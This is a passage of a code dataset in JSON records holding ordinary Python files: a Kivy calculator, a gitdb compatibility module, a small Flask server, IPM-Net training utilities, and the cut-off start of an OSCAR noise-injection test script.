"call"}, {"api_name": "Home.models.Task.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "Home.models.Task", "line_number": 43, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 45, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "4220175604", "text": "from kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.textinput import TextInput\nfrom kivy.utils import get_color_from_hex\n\n\nclass MainApp(App):\n\n def build(self):\n\n self.buttons = [[\"7\", \"8\", \"9\", \"/\"],\n [\"4\", \"5\", \"6\", \"*\"],\n [\"1\", \"2\", \"3\", \"-\"],\n [\".\", \"0\", \"C\", \"+\"],\n [\"=\"]\n ]\n self.operators = [\"/\", \"*\", \"-\", \"+\"]\n\n self.azul = '#56DEFF'\n\n self.solution = TextInput(readonly=True, text='')\n self.main_layout = BoxLayout(orientation=\"vertical\", spacing=10, padding=10)\n self.main_layout.add_widget(self.solution)\n self.equal_button = Button(text=\"=\", pos_hint={\"center_x\": .5, \"center_y\": .5})\n for row in self.buttons:\n r_layout = BoxLayout()\n for label in row:\n button = Button(text=label, pos_hint={\"center_x\": .5, \"center_y\": .5},\n background_color=get_color_from_hex(self.azul))\n\n button.bind(on_press=self.on_button_press)\n r_layout.add_widget(button)\n self.main_layout.add_widget(r_layout)\n\n return self.main_layout\n\n def on_button_press(self, instance):\n if instance.text != '=' and instance.text != 'C':\n self.solution.text += instance.text\n elif instance.text == 'C':\n self.solution.text = ''\n else:\n try:\n result = eval(self.solution.text)\n self.solution.text = str(result)\n print(result)\n except SyntaxError:\n print(\"Invalid syntax in expression\")\n\n\nif __name__ == '__main__':\n app = MainApp()\n app.run()\n", "repo_name": "alexandrecruzdev/Calculadora-Kivy-Python", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1809, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "kivy.app.App", "line_number": 8, "usage_type": "name"}, {"api_name": "kivy.uix.textinput.TextInput", "line_number": 22, "usage_type": "call"}, {"api_name": "kivy.uix.boxlayout.BoxLayout", "line_number": 23, "usage_type": "call"}, {"api_name": "kivy.uix.button.Button", "line_number": 25, "usage_type": "call"}, {"api_name": "kivy.uix.boxlayout.BoxLayout", "line_number": 27, "usage_type": "call"}, {"api_name": "kivy.uix.button.Button", "line_number": 29, "usage_type": "call"}, {"api_name": "kivy.utils.get_color_from_hex", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "26566118585", "text": "import sys\n\nPY3 = sys.version_info[0] == 3\n\ntry:\n from itertools import izip\n xrange = xrange\nexcept ImportError:\n # py3\n izip = zip\n xrange = range\n# end handle python version\n\ntry:\n # Python 2\n buffer = buffer\n memoryview = buffer\n # Assume no memory view ...\n def to_bytes(i):\n return i\nexcept NameError:\n # Python 3 has no `buffer`; only `memoryview`\n # However, it's faster to just slice the object directly, maybe it keeps a view internally\n def buffer(obj, offset, size=None):\n if size is None:\n # return memoryview(obj)[offset:]\n return obj[offset:]\n else:\n # return memoryview(obj)[offset:offset+size]\n return obj[offset:offset + size]\n # end buffer reimplementation\n # smmap can return memory view objects, which can't be compared as buffers/bytes can ... \n def to_bytes(i):\n if isinstance(i, memoryview):\n return i.tobytes()\n return i\n\n memoryview = memoryview\n\ntry:\n MAXSIZE = sys.maxint\nexcept AttributeError:\n MAXSIZE = sys.maxsize\n", "repo_name": "FelixZFB/Python_prevent_spider", "sub_path": "venv/Lib/site-packages/gitdb/utils/compat.py", "file_name": "compat.py", "file_ext": "py", "file_size_in_byte": 1093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 3, "usage_type": "attribute"}, {"api_name": "itertools.izip", "line_number": 10, "usage_type": "name"}, {"api_name": "sys.maxint", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.maxsize", "line_number": 43, "usage_type": "attribute"}]}
+{"seq_id": "74357896486", "text": "from flask import Flask\nimport threading\nimport time\n\napp = Flask(__name__)\n\n\nt_buff = 0\nf_buff = 0\nh_buff = 0\n\n\n\n@app.route('/get_num_1', methods=[\"GET\"])\ndef get_num_1():\n with open('number.txt', 'r') as f:\n lines = f.readline() \n print(lines)\n t_buff = lines.split()[0]\n f_buff = lines.split()[1]\n h_buff = lines.split()[2]\n\n num_dict = {\n 't': t_buff,\n 'f': f_buff,\n 'h': h_buff,\n }\n return num_dict\n\n\n\n\n@app.route('/get_table', methods=[\"GET\"])\ndef get_table():\n v = {\n 'id': \"100\",\n 'First_Name': \"Y\",\n 'Last_Name': \"D\",\n \"User_Name\": \"C\"\n }\n return v\n\n\nif __name__ == '__main__':\n # t1 = threading.Thread(target=read_from_txt, )\n # t1.start()\n app.run()\n", "repo_name": "dc-ying/dashboard_ui", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 763, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}]}
+{"seq_id": "73361110888", "text": "# -*- coding: utf-8 -*-\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nfrom torch.optim import lr_scheduler\nfrom torchvision import transforms\nfrom data import ImageFilelist, ImageFolder\nimport torch\nimport torch.nn as nn\nimport os\nimport math\nimport torchvision.utils as vutils\nimport yaml\nimport numpy as np\nimport torch.nn.init as init\nimport time\nimport torchfile\nimport random\nimport pickle\nimport resnet\n# Methods\n# get_all_data_loaders : primary data loader interface (load trainA, testA, trainB, testB)\n# get_data_loader_list : list-based data loader\n# get_data_loader_folder : folder-based data loader\n# get_config : load yaml file\n# eformat :\n# write_2images : save output image\n# prepare_sub_folder : create checkpoints and images folders for saving outputs\n# write_one_row_html : write one row of the html file for output images\n# write_html : create the html file.\n# write_loss\n# slerp\n# get_slerp_interp\n# get_model_list\n# load_vgg16\n# load_inception\n# vgg_preprocess\n# get_scheduler\n# weights_init\n\ndef get_all_data_loaders(conf):\n batch_size = conf['batch_size']\n num_workers = conf['num_workers']\n if 'new_size' in conf:\n new_size_a = new_size_b = conf['new_size']\n else:\n new_size_a = conf['new_size_a']\n new_size_b = conf['new_size_b']\n height = conf['crop_image_height']\n width = conf['crop_image_width']\n # data loader\n train_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA'), batch_size, True,\n new_size_a, height, width, num_workers, True, True)\n test_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA'), batch_size, False,\n new_size_a, height, width, num_workers, True, True)\n train_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainB'), batch_size, True,\n new_size_b, height, width, num_workers, True, True)\n test_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB'), batch_size, False,\n new_size_b, height, width, num_workers, True, True)\n train_mask_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA_face'), batch_size, False,\n new_size_a, height, width, num_workers, True, False)\n train_mask_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainB_face'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n test_mask_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA_face'), batch_size, False,\n new_size_a, height, width, num_workers, True, False)\n test_mask_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB_face'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n train_texture_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'train', 'trainA_highcontract'), batch_size, False,\n new_size_a,height, width, num_workers, True, False)\n train_texture_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'train','trainB_highcontract'), batch_size, False,\n new_size_b, height, width, num_workers, True, False)\n test_texture_loader_a = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testA_highcontract'), batch_size, False,\n new_size_a,height, width, num_workers, True, False)\n test_texture_loader_b = get_data_loader_folder(os.path.join(conf['data_root'], 'test', 'testB_highcontract'), batch_size, False,\n new_size_b, height, width, num_workers, 
True, False)\n\n return train_loader_a, train_loader_b, test_loader_a, test_loader_b, train_mask_loader_a, train_mask_loader_b,\\\n test_mask_loader_a, test_mask_loader_b, train_texture_loader_a, train_texture_loader_b, \\\n test_texture_loader_a, test_texture_loader_b\n\ndef get_data_loader_folder(input_folder, batch_size, train, new_size=None,\n height=256, width=256, num_workers=4, crop=True, not_mask=True):\n transform_list = [transforms.ToTensor()]\n transform_list = transform_list + [transforms.Normalize((0.5, 0.5, 0.5),(0.5, 0.5, 0.5))] if not_mask else transform_list\n transform_list = [transforms.CenterCrop((height, width))] + transform_list if crop else transform_list\n transform_list = [transforms.Resize(new_size)] + transform_list if new_size is not None else transform_list\n # transform_list = [transforms.RandomHorizontalFlip()] + transform_list if train else transform_list\n transform = transforms.Compose(transform_list)\n dataset = ImageFolder(input_folder, transform=transform)\n loader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=False, drop_last=True, num_workers=num_workers)\n return loader\n\n\ndef get_config(config):\n with open(config, 'r') as stream:\n return yaml.load(stream)\n\n\ndef eformat(f, prec):\n s = \"%.*e\"%(prec, f)\n mantissa, exp = s.split('e')\n # add 1 to digits as 1 is taken by sign +/-\n return \"%se%d\"%(mantissa, int(exp))\n\n\ndef __write_images(image_outputs, display_image_num, file_name):\n image_outputs = [images.expand(-1, 3, -1, -1) for images in image_outputs] # expand gray-scale images to 3 channels\n image_tensor = torch.cat([images[:display_image_num] for images in image_outputs], 0)\n image_grid = vutils.make_grid(image_tensor.data, nrow=display_image_num, padding=0, normalize=True, scale_each=True)\n vutils.save_image(image_grid, file_name, nrow=1)\n\n\ndef write_2images(image_outputs, display_image_num, image_directory, postfix):\n n = len(image_outputs)\n __write_images(image_outputs[0:n//2], display_image_num, '%s/gen_a2b_%s.jpg' % (image_directory, postfix))\n __write_images(image_outputs[n//2:n], display_image_num, '%s/gen_b2a_%s.jpg' % (image_directory, postfix))\n\n\ndef prepare_sub_folder(output_directory):\n image_directory = os.path.join(output_directory, 'images')\n if not os.path.exists(image_directory):\n print(\"Creating directory: {}\".format(image_directory))\n os.makedirs(image_directory)\n checkpoint_directory = os.path.join(output_directory, 'checkpoints')\n if not os.path.exists(checkpoint_directory):\n print(\"Creating directory: {}\".format(checkpoint_directory))\n os.makedirs(checkpoint_directory)\n return checkpoint_directory, image_directory\n\n\ndef write_one_row_html(html_file, iterations, img_filename, all_size):\n html_file.write(\"iteration [%d] (%s) \" % (iterations,img_filename.split('/')[-1]))\n html_file.write(\"\"\"\n \n \n \n
\n \"\"\" % (img_filename, img_filename, all_size))\n return\n\n\ndef write_html(filename, iterations, image_save_iterations, image_directory, all_size=1536):\n html_file = open(filename, \"w\")\n html_file.write('''\n \n \n
\n Experiment name = %s \n \n \n \n ''' % os.path.basename(filename))\n html_file.write(\"current \")\n write_one_row_html(html_file, iterations, '%s/gen_a2b_train_current.jpg' % (image_directory), all_size)\n write_one_row_html(html_file, iterations, '%s/gen_b2a_train_current.jpg' % (image_directory), all_size)\n for j in range(iterations, image_save_iterations-1, -1):\n if j % image_save_iterations == 0:\n write_one_row_html(html_file, j, '%s/gen_a2b_test_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_b2a_test_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_a2b_train_%08d.jpg' % (image_directory, j), all_size)\n write_one_row_html(html_file, j, '%s/gen_b2a_train_%08d.jpg' % (image_directory, j), all_size)\n html_file.write(\"\")\n html_file.close()\n\n\ndef write_loss(iterations, trainer, train_writer):\n members = [attr for attr in dir(trainer) \\\n if not callable(getattr(trainer, attr)) and not attr.startswith(\"__\") and ('loss' in attr or 'grad' in attr or 'nwd' in attr)]\n for m in members:\n train_writer.add_scalar(m, getattr(trainer, m), iterations + 1)\n\n\ndef slerp(val, low, high):\n \"\"\"\n original: Animating Rotation with Quaternion Curves, Ken Shoemake\n https://arxiv.org/abs/1609.04468\n Code: https://github.com/soumith/dcgan.torch/issues/14, Tom White\n \"\"\"\n omega = np.arccos(np.dot(low / np.linalg.norm(low), high / np.linalg.norm(high)))\n so = np.sin(omega)\n return np.sin((1.0 - val) * omega) / so * low + np.sin(val * omega) / so * high\n\n\ndef get_slerp_interp(nb_latents, nb_interp, z_dim):\n \"\"\"\n modified from: PyTorch inference for \"Progressive Growing of GANs\" with CelebA snapshot\n https://github.com/ptrblck/prog_gans_pytorch_inference\n \"\"\"\n\n latent_interps = np.empty(shape=(0, z_dim), dtype=np.float32)\n for _ in range(nb_latents):\n low = np.random.randn(z_dim)\n high = np.random.randn(z_dim) # low + np.random.randn(512) * 0.7\n interp_vals = np.linspace(0, 1, num=nb_interp)\n latent_interp = np.array([slerp(v, low, high) for v in interp_vals],\n dtype=np.float32)\n latent_interps = np.vstack((latent_interps, latent_interp))\n\n return latent_interps[:, :, np.newaxis, np.newaxis]\n\n\n# Get model list for resume\ndef get_model_list(dirname, key):\n if os.path.exists(dirname) is False:\n return None\n gen_models = [os.path.join(dirname, f) for f in os.listdir(dirname) if\n os.path.isfile(os.path.join(dirname, f)) and key in f and \".pt\" in f]\n if gen_models is None:\n return None\n gen_models.sort()\n last_model_name = gen_models[-1]\n return last_model_name\n\n\ndef load_resnet50(model_dir):\n model = resnet.resnet50()\n load_state_dict(model, model_dir)\n return model\n\ndef load_inception(model_path):\n state_dict = torch.load(model_path)\n model = inception_v3(pretrained=False, transform_input=True)\n model.aux_logits = False\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, state_dict['fc.weight'].size(0))\n model.load_state_dict(state_dict)\n for param in model.parameters():\n param.requires_grad = False\n return model\n\ndef vgg_preprocess(batch):\n tensortype = type(batch.data)\n (r, g, b) = torch.chunk(batch, 3, dim = 1)\n batch = torch.cat((b, g, r), dim = 1) # convert RGB to BGR\n batch = (batch + 1) * 255 * 0.5 # [-1, 1] -> [0, 255]\n mean = tensortype(batch.data.size()).cuda()\n mean[:, 0, :, :] = 103.939\n mean[:, 1, :, :] = 116.779\n mean[:, 2, :, :] = 123.680\n batch = batch.sub(Variable(mean)) # subtract mean\n return 
batch\n\n\ndef get_scheduler(optimizer, hyperparameters, iterations=-1):\n if 'lr_policy' not in hyperparameters or hyperparameters['lr_policy'] == 'constant':\n scheduler = None # constant scheduler\n elif hyperparameters['lr_policy'] == 'step':\n scheduler = lr_scheduler.StepLR(optimizer, step_size=hyperparameters['step_size'],\n gamma=hyperparameters['gamma'], last_epoch=iterations)\n else:\n return NotImplementedError('learning rate policy [%s] is not implemented', hyperparameters['lr_policy'])\n return scheduler\n\n\ndef weights_init(init_type='gaussian'):\n def init_fun(m):\n classname = m.__class__.__name__\n if (classname.find('Conv') == 0 or classname.find('Linear') == 0) and hasattr(m, 'weight'):\n # print m.__class__.__name__\n if init_type == 'gaussian':\n init.normal_(m.weight.data, 0.0, 0.02)\n elif init_type == 'xavier':\n init.xavier_normal_(m.weight.data, gain=math.sqrt(2))\n elif init_type == 'kaiming':\n init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')\n elif init_type == 'orthogonal':\n init.orthogonal_(m.weight.data, gain=math.sqrt(2))\n elif init_type == 'default':\n pass\n else:\n assert 0, \"Unsupported initialization: {}\".format(init_type)\n if hasattr(m, 'bias') and m.bias is not None:\n init.constant_(m.bias.data, 0.0)\n\n return init_fun\n\n\nclass Timer:\n def __init__(self, msg):\n self.msg = msg\n self.start_time = None\n\n def __enter__(self):\n self.start_time = time.time()\n\n def __exit__(self, exc_type, exc_value, exc_tb):\n print(self.msg % (time.time() - self.start_time))\n\n\ndef pytorch03_to_pytorch04(state_dict_base, trainer_name):\n def __conversion_core(state_dict_base, trainer_name):\n state_dict = state_dict_base.copy()\n if trainer_name == 'IPMNet':\n for key, value in state_dict_base.items():\n if key.endswith(('enc_content.model.0.norm.running_mean',\n 'enc_content.model.0.norm.running_var',\n 'enc_content.model.1.norm.running_mean',\n 'enc_content.model.1.norm.running_var',\n 'enc_content.model.2.norm.running_mean',\n 'enc_content.model.2.norm.running_var',\n 'enc_content.model.3.model.0.model.1.norm.running_mean',\n 'enc_content.model.3.model.0.model.1.norm.running_var',\n 'enc_content.model.3.model.0.model.0.norm.running_mean',\n 'enc_content.model.3.model.0.model.0.norm.running_var',\n 'enc_content.model.3.model.1.model.1.norm.running_mean',\n 'enc_content.model.3.model.1.model.1.norm.running_var',\n 'enc_content.model.3.model.1.model.0.norm.running_mean',\n 'enc_content.model.3.model.1.model.0.norm.running_var',\n 'enc_content.model.3.model.2.model.1.norm.running_mean',\n 'enc_content.model.3.model.2.model.1.norm.running_var',\n 'enc_content.model.3.model.2.model.0.norm.running_mean',\n 'enc_content.model.3.model.2.model.0.norm.running_var',\n 'enc_content.model.3.model.3.model.1.norm.running_mean',\n 'enc_content.model.3.model.3.model.1.norm.running_var',\n 'enc_content.model.3.model.3.model.0.norm.running_mean',\n 'enc_content.model.3.model.3.model.0.norm.running_var',\n )):\n del state_dict[key]\n else:\n def __conversion_core(state_dict_base):\n state_dict = state_dict_base.copy()\n for key, value in state_dict_base.items():\n if key.endswith(('enc.model.0.norm.running_mean',\n 'enc.model.0.norm.running_var',\n 'enc.model.1.norm.running_mean',\n 'enc.model.1.norm.running_var',\n 'enc.model.2.norm.running_mean',\n 'enc.model.2.norm.running_var',\n 'enc.model.3.model.0.model.1.norm.running_mean',\n 'enc.model.3.model.0.model.1.norm.running_var',\n 'enc.model.3.model.0.model.0.norm.running_mean',\n 
'enc.model.3.model.0.model.0.norm.running_var',\n 'enc.model.3.model.1.model.1.norm.running_mean',\n 'enc.model.3.model.1.model.1.norm.running_var',\n 'enc.model.3.model.1.model.0.norm.running_mean',\n 'enc.model.3.model.1.model.0.norm.running_var',\n 'enc.model.3.model.2.model.1.norm.running_mean',\n 'enc.model.3.model.2.model.1.norm.running_var',\n 'enc.model.3.model.2.model.0.norm.running_mean',\n 'enc.model.3.model.2.model.0.norm.running_var',\n 'enc.model.3.model.3.model.1.norm.running_mean',\n 'enc.model.3.model.3.model.1.norm.running_var',\n 'enc.model.3.model.3.model.0.norm.running_mean',\n 'enc.model.3.model.3.model.0.norm.running_var',\n\n 'dec.model.0.model.0.model.1.norm.running_mean',\n 'dec.model.0.model.0.model.1.norm.running_var',\n 'dec.model.0.model.0.model.0.norm.running_mean',\n 'dec.model.0.model.0.model.0.norm.running_var',\n 'dec.model.0.model.1.model.1.norm.running_mean',\n 'dec.model.0.model.1.model.1.norm.running_var',\n 'dec.model.0.model.1.model.0.norm.running_mean',\n 'dec.model.0.model.1.model.0.norm.running_var',\n 'dec.model.0.model.2.model.1.norm.running_mean',\n 'dec.model.0.model.2.model.1.norm.running_var',\n 'dec.model.0.model.2.model.0.norm.running_mean',\n 'dec.model.0.model.2.model.0.norm.running_var',\n 'dec.model.0.model.3.model.1.norm.running_mean',\n 'dec.model.0.model.3.model.1.norm.running_var',\n 'dec.model.0.model.3.model.0.norm.running_mean',\n 'dec.model.0.model.3.model.0.norm.running_var',\n )):\n del state_dict[key]\n return state_dict\n\n state_dict = dict()\n state_dict['a'] = __conversion_core(state_dict_base['a'], trainer_name)\n state_dict['b'] = __conversion_core(state_dict_base['b'], trainer_name)\n return state_dict\n\ndef randomflip(image, mask, texture):\n randnum = random.random()\n if randnum > 0.5:\n image = image.flip(3)\n mask, texture = mask.flip(3), texture.flip(3)\n return image, mask, texture\n\ndef randomcrop(image, mask, texture, height, width):\n random_h = random.randint(0, image.size()[2] - height)\n random_w = random.randint(0, image.size()[3] - width)\n image = image[:, :,random_h: random_h + height, random_w : random_w + width]\n mask = mask[:, :,random_h: random_h + height, random_w : random_w + width]\n texture = texture[:, :,random_h: random_h + height, random_w : random_w + width]\n return image, mask, texture\n\ndef load_state_dict(model, fname):\n \"\"\"\n Set parameters converted from Caffe models authors of VGGFace2 provide.\n See https://www.robots.ox.ac.uk/~vgg/data/vgg_face2/.\n Arguments:\n model: model\n fname: file name of parameters converted from a Caffe model, assuming the file format is Pickle.\n \"\"\"\n with open(fname, 'rb') as f:\n weights = pickle.load(f, encoding='latin1')\n\n own_state = model.state_dict()\n for name, param in weights.items():\n if name in own_state:\n try:\n own_state[name] = torch.from_numpy(param)\n # own_state[name].copy_(torch.from_numpy(param))\n except Exception:\n raise RuntimeError('While copying the parameter named {}, whose dimensions in the model are {} and whose '\\\n 'dimensions in the checkpoint are {}.'.format(name, own_state[name].size(), param.size()))\n else:\n raise KeyError('unexpected key \"{}\" in state_dict'.format(name))\n\n", "repo_name": "huangzhikun1995/IPM-Net", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 20670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 127, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 82, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 83, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 83, "usage_type": "name"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 84, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 85, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 85, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 87, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 87, "usage_type": "name"}, {"api_name": "data.ImageFolder", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 89, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 107, "usage_type": "call"}, {"api_name": "torchvision.utils.make_grid", "line_number": 108, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 108, "usage_type": "name"}, {"api_name": "torchvision.utils.save_image", "line_number": 109, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 109, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 123, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.arccos", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 178, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 191, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 192, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 195, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 206, "usage_type": "call"}, {"api_name": "resnet.resnet50", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 224, "usage_type": "name"}, {"api_name": "torch.chunk", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 247, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 260, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 262, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.nn.init.kaiming_normal_", "line_number": 264, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 264, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", 
"line_number": 266, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 266, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 266, "usage_type": "call"}, {"api_name": "torch.nn.init.constant_", "line_number": 272, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 272, "usage_type": "name"}, {"api_name": "time.time", "line_number": 283, "usage_type": "call"}, {"api_name": "time.time", "line_number": 286, "usage_type": "call"}, {"api_name": "random.random", "line_number": 371, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 378, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 379, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 394, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 400, "usage_type": "call"}]}
+{"seq_id": "74971681767", "text": "import argparse\n\n# Create parser for reading program arguments\nimport os\nimport shutil\nimport subprocess\nimport jellyfish as jf\nimport numpy\nimport numpy as np\nimport time\nfrom tqdm import tqdm\n\n\n# Convert a string to unicode\ndef to_unicode(code: int):\n return chr(int(str(code).zfill(8), 16))\n\n\ndef flatten_results_map(results_map):\n total = \"\"\n for key in results_map.keys():\n total += f\"({key},{round(results_map[key], 4)})\"\n return total\n\n\nargparser = argparse.ArgumentParser(\n prog='testscript',\n description='Automate OSCAR\\'s noise injection routine.',\n epilog='Run with argument -h for help.'\n)\n\nDISTANCE_ALGS = {\n 0: \"Levenshtein\",\n 1: \"Damerau-Levenshtein\",\n 2: \"Jaro\",\n 3: \"Jaro-Wrinkler\",\n 4: \"Hamming\",\n}\n\nargparser.add_argument('program_dir', help='location of program to run.')\nargparser.add_argument('executable', help='Name of program\\'s main class to run or jar file name.')\nargparser.add_argument('program_args', type=str, help='Arguments to be passed to program.')\n\nargparser.add_argument('-c', '--count', default=\"30\", type=str,\n help='Number of times to run program (comma separated).')\nargparser.add_argument('-da', '--distance_algorithm', default=\"0\", type=int,\n help=f'Distance algorithm: {DISTANCE_ALGS}.')\nargparser.add_argument('-j', '--jar', action='store_true', help='Run program as a jar.')\nargparser.add_argument('-dt', '--disable_thread_ids', action='store_true', help='Disable thread ID parsing.')\nargparser.add_argument('-utl', '--unique_trace_locations', action='store_true',\n help='Enable unique ids for repeated trace 